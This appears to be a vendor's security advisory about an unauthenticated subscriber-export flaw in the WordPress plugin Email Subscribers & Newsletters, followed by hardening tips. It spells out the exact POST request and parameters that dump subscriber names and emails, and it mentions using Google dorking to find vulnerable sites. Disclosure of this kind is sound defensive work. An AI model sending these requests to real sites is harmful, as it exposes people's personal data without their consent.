A vulnerability that could have ended up in the theft of millions of emails. During a routine audit for open source projects, we discovered Improper Access Control vulnerability in Email Subscribers & Newsletters, a popular WordPress plugin that is active on more than 100000 websites. The vulnerability allows an unauthenticated user to download the entire list of particular website subscribers with names and e-mail addresses. This vulnerability has been patched in v3.4.8 so we would like to remind all plugin users to upgrade to a secure version as soon as possible.
Vulnerability exploitation method
- Sending an HTTP POST request to the particular website address with /?es=export at the end and adding extra
POST data such as
option=view_all_subscriberswill allow you to download a CSV data file with all subscriber data.
- The file which makes the export is named export-email-address.php, and there are other options available like view_active_subscribers, view_inactive_subscribers, registered_user, commentposed_user.
We were able to find 81756 websites that use this software just by using Google dorking and several other publicly available techniques. It can be assumed that if the attacker writes a bot that is able to automate subscriber data collection, the total number of collected e-mail addresses could reach millions.
Some tips on how to improve the security of your WordPress site.
- Keep WordPress core and all plugins up-to-date.
- Use only plugins which you really need. The less you use, the lesser the risk.
- Do not keep inactive plugins.
- Strong passwords and Two Factor Authentication or CAPTCHA.
- Principle of least privilege.
- Implement basic hardening according to WordPress Codex.
- Make sure your hosting server is up to date and secured.
- Try not to use simple FTP connection and don’t keep passwords in plane text.
- Make sure you’re not using any vulnerable software on your website. You can check it on our free database of WordPress vulnerabilities, or you can simply install our WordPress security plugin that will check the status of your software and several other security parameters for you automatically.
By the way, we have some interesting data, you can check the statistics of vulnerabilities for the 2017 year here.